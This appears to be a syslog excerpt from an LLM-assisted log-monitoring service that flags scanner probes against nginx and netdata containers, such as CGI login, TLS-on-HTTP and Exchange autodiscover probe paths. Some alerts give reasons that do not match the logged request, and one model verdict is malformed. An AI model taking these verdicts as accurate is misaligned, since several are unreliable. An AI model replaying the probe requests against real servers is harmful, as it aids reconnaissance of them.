Mar 20 09:19:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:30.685686 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 09:19:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:30.685734 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to CGI script login.cgi in /cgi-bin may indicate probing for vulnerable CGI endpoints; the file missing indicates potential exploratory behavior rather than a legitimate request. Line=2026-03-20T09:19:18.484422139Z 2026/03/20 09:19:18 [error] 422#422: *748025 open() "/usr/share/nginx/default/cgi-bin/login.cgi" failed (2: No such file or directory), client: 216.180.246.228, server: ...
Mar 20 09:19:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:30.685785 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:18.484464998Z 216.180.246.228 - - [20/Mar/2026:09:19:18 +0000] "54.200.221.0" "GET /cgi-bin/login.cgi HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www...
Mar 20 09:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:31.937639 [observer] Pipeline: processed=3776 pattern_hits=3701 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:31.937667 [observer] Patterns: hash=3701 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:20:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:02.045678 [observer] Pipeline: processed=3778 pattern_hits=3703 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:20:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:02.045711 [observer] Patterns: hash=3703 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:31.934135 [observer] Pipeline: processed=3782 pattern_hits=3707 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:20:31.934175 [observer] Patterns: hash=3707 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:01.940971 [observer] Pipeline: processed=3784 pattern_hits=3709 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:01.941000 [observer] Patterns: hash=3709 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:31.934736 [observer] Pipeline: processed=3786 pattern_hits=3711 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:21:31.934760 [observer] Patterns: hash=3711 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:01.972437 [observer] Pipeline: processed=3790 pattern_hits=3715 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:01.973749 [observer] Patterns: hash=3715 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:31.948491 [observer] Pipeline: processed=3794 pattern_hits=3719 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:22:31.948517 [observer] Patterns: hash=3719 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:01.938179 [observer] Pipeline: processed=3798 pattern_hits=3723 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:01.938745 [observer] Patterns: hash=3723 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:31.943702 [observer] Pipeline: processed=3800 pattern_hits=3725 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:23:31.943729 [observer] Patterns: hash=3725 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:01.944482 [observer] Pipeline: processed=3804 pattern_hits=3729 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:01.944525 [observer] Patterns: hash=3729 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:31.943586 [observer] Pipeline: processed=3806 pattern_hits=3731 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:24:31.943614 [observer] Patterns: hash=3731 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:01.954826 [observer] Pipeline: processed=3808 pattern_hits=3733 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:01.954856 [observer] Patterns: hash=3733 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:31.939869 [observer] Pipeline: processed=3812 pattern_hits=3737 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:25:31.939892 [observer] Patterns: hash=3737 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:01.963191 [observer] Pipeline: processed=3814 pattern_hits=3739 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:01.963231 [observer] Patterns: hash=3739 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:31.935468 [observer] Pipeline: processed=3818 pattern_hits=3743 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:26:31.935498 [observer] Patterns: hash=3743 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:01.964792 [observer] Pipeline: processed=3820 pattern_hits=3745 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:01.964819 [observer] Patterns: hash=3745 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:31.935665 [observer] Pipeline: processed=3826 pattern_hits=3751 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:27:31.935699 [observer] Patterns: hash=3751 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:01.998239 [observer] Pipeline: processed=3828 pattern_hits=3753 llm_calls=75 llm_errors=0 learned=0
Mar 20 09:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:01.998304 [observer] Patterns: hash=3753 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=75
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:30.029350 [llm] Failed to parse verdict from: {
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "classification": "safe",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "confidence": 0. nine,
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "reason": "Normal HTTP GET request for robots.txt with 200 response, typical keep-alive style access log.",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "action": "allow",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "pattern_type": "prefix",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "pattern": "GET /robots.txt",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "source_hint": "webserver",
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: "variable_fields": [
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: {"token": "2026-03-20T09:28:25.058825312Z", "type": "timestamp", "replacement": ""},
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: {"token": "1.967 ms", "type": "duration", "replacement": ""}
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: ]
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: }
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:30.029406 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character ' ' after decimal point in numeric literal
Mar 20 09:28:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:30.029416 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-20T09:28:25.058825312Z GET /robots.txt 200 1.967 ms - 26
Mar 20 09:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:31.936653 [observer] Pipeline: processed=3832 pattern_hits=3756 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:28:31.936682 [observer] Patterns: hash=3756 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:01.942496 [observer] Pipeline: processed=3836 pattern_hits=3760 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:01.942534 [observer] Patterns: hash=3760 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:31.942085 [observer] Pipeline: processed=3838 pattern_hits=3762 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:29:31.942108 [observer] Patterns: hash=3762 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:01.963846 [observer] Pipeline: processed=3842 pattern_hits=3766 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:01.963879 [observer] Patterns: hash=3766 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:31.943560 [observer] Pipeline: processed=3844 pattern_hits=3768 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:30:31.943586 [observer] Patterns: hash=3768 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:01.958761 [observer] Pipeline: processed=3848 pattern_hits=3772 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:01.958794 [observer] Patterns: hash=3772 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:31.943300 [observer] Pipeline: processed=3850 pattern_hits=3774 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:31:31.943334 [observer] Patterns: hash=3774 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:01.954660 [observer] Pipeline: processed=3852 pattern_hits=3776 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:01.954693 [observer] Patterns: hash=3776 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:31.935190 [observer] Pipeline: processed=3858 pattern_hits=3782 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:32:31.935220 [observer] Patterns: hash=3782 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:01.948093 [observer] Pipeline: processed=3860 pattern_hits=3784 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:01.948120 [observer] Patterns: hash=3784 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:31.934133 [observer] Pipeline: processed=3864 pattern_hits=3788 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:33:31.934192 [observer] Patterns: hash=3788 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:01.959364 [observer] Pipeline: processed=3866 pattern_hits=3790 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:01.959391 [observer] Patterns: hash=3790 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:31.934411 [observer] Pipeline: processed=3870 pattern_hits=3794 llm_calls=76 llm_errors=1 learned=0
Mar 20 09:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:31.934432 [observer] Patterns: hash=3794 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=76
Mar 20 09:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:57.716234 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 09:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:34:57.716269 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 09:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:01.948570 [observer] Pipeline: processed=3874 pattern_hits=3796 llm_calls=78 llm_errors=1 learned=0
Mar 20 09:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:01.948600 [observer] Patterns: hash=3796 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=78
Mar 20 09:35:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:05.901112 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 09:35:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:05.901248 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A WARNING about a missing configuration file could indicate a misconfiguration or environment drift. Not inherently malicious but warrants monitoring. Line=2026-03-20T09:34:51.559617314Z 2026-03-20 09:34:51: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.
Mar 20 09:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:11.896981 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 09:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:11.897013 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A missing configuration file warning from a netdata-related helper could indicate misconfiguration or missing mounts; not immediately malicious but warrants inspection. Line=2026-03-20T09:34:51.561251563Z 2026-03-20 09:34:51: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 09:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:31.949008 [observer] Pipeline: processed=3877 pattern_hits=3798 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:35:31.949037 [observer] Patterns: hash=3798 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:01.944171 [observer] Pipeline: processed=3881 pattern_hits=3802 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:01.944200 [observer] Patterns: hash=3802 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:31.944665 [observer] Pipeline: processed=3883 pattern_hits=3804 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:36:31.944693 [observer] Patterns: hash=3804 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:01.943394 [observer] Pipeline: processed=3888 pattern_hits=3809 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:01.943492 [observer] Patterns: hash=3809 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:31.944842 [observer] Pipeline: processed=3892 pattern_hits=3813 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:37:31.944870 [observer] Patterns: hash=3813 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:01.996224 [observer] Pipeline: processed=3896 pattern_hits=3817 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:01.996266 [observer] Patterns: hash=3817 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:31.943771 [observer] Pipeline: processed=3898 pattern_hits=3819 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:38:31.943798 [observer] Patterns: hash=3819 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:01.939141 [observer] Pipeline: processed=3900 pattern_hits=3821 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:01.939508 [observer] Patterns: hash=3821 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:31.936786 [observer] Pipeline: processed=3904 pattern_hits=3825 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:39:31.936811 [observer] Patterns: hash=3825 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:01.985957 [observer] Pipeline: processed=3906 pattern_hits=3827 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:01.985990 [observer] Patterns: hash=3827 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:31.933979 [observer] Pipeline: processed=3910 pattern_hits=3831 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:40:31.934002 [observer] Patterns: hash=3831 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:01.965858 [observer] Pipeline: processed=3912 pattern_hits=3833 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:01.965885 [observer] Patterns: hash=3833 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:31.934950 [observer] Pipeline: processed=3915 pattern_hits=3836 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:41:31.934977 [observer] Patterns: hash=3836 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:01.944019 [observer] Pipeline: processed=3918 pattern_hits=3839 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:01.944045 [observer] Patterns: hash=3839 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:31.934888 [observer] Pipeline: processed=3922 pattern_hits=3843 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:42:31.934913 [observer] Patterns: hash=3843 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:01.941177 [observer] Pipeline: processed=3926 pattern_hits=3847 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:01.941207 [observer] Patterns: hash=3847 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:31.944540 [observer] Pipeline: processed=3928 pattern_hits=3849 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:43:31.944574 [observer] Patterns: hash=3849 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:01.944988 [observer] Pipeline: processed=3932 pattern_hits=3853 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:01.945021 [observer] Patterns: hash=3853 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:31.941497 [observer] Pipeline: processed=3934 pattern_hits=3855 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:44:31.941523 [observer] Patterns: hash=3855 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:01.949798 [observer] Pipeline: processed=3937 pattern_hits=3858 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:01.949832 [observer] Patterns: hash=3858 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:31.940741 [observer] Pipeline: processed=3940 pattern_hits=3861 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:45:31.940765 [observer] Patterns: hash=3861 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:01.955224 [observer] Pipeline: processed=3942 pattern_hits=3863 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:01.955250 [observer] Patterns: hash=3863 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:31.939745 [observer] Pipeline: processed=3946 pattern_hits=3867 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:46:31.939779 [observer] Patterns: hash=3867 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:01.952099 [observer] Pipeline: processed=3948 pattern_hits=3869 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:01.952134 [observer] Patterns: hash=3869 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:31.935099 [observer] Pipeline: processed=3954 pattern_hits=3875 llm_calls=79 llm_errors=1 learned=0
Mar 20 09:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:31.935125 [observer] Patterns: hash=3875 prefix=0 regex=0 contains=0 deny=17 alert=292 suppress=0 misses=79
Mar 20 09:47:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:33.648427 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:47:33.648112258Z 66.132.172.201 - - [20/Mar/2026:09:47:33 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03u\xB9\xD9\xA5\xB9>\xD7\x19d\x9F\xA0 \x97\xAF\xF2c\x88\x1D\x82uP\x84\xE1\...
Mar 20 09:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:37.978937 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:47:37.978704460Z 66.132.172.201 - - [20/Mar/2026:09:47:37 +0000] "_" "PRI * HTTP/2.0" 400 150 "-" "-" "-" Mar 20 09:47:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:47:39.073879 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:47:39.073592574Z 66.132.172.201 - - [20/Mar/2026:09:47:39 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censy... Mar 20 09:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:01.952565 [observer] Pipeline: processed=3961 pattern_hits=3882 llm_calls=79 llm_errors=1 learned=0 Mar 20 09:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:01.952600 [observer] Patterns: hash=3882 prefix=0 regex=0 contains=0 deny=18 alert=294 suppress=0 misses=79 Mar 20 09:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:31.934972 [observer] Pipeline: processed=3964 pattern_hits=3885 llm_calls=79 llm_errors=1 learned=0 Mar 20 09:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:31.934996 [observer] Patterns: hash=3885 prefix=0 regex=0 contains=0 deny=18 alert=294 suppress=0 misses=79 Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.236358 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 09:48:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:48:47.236399 [SUSPICIOUS] 
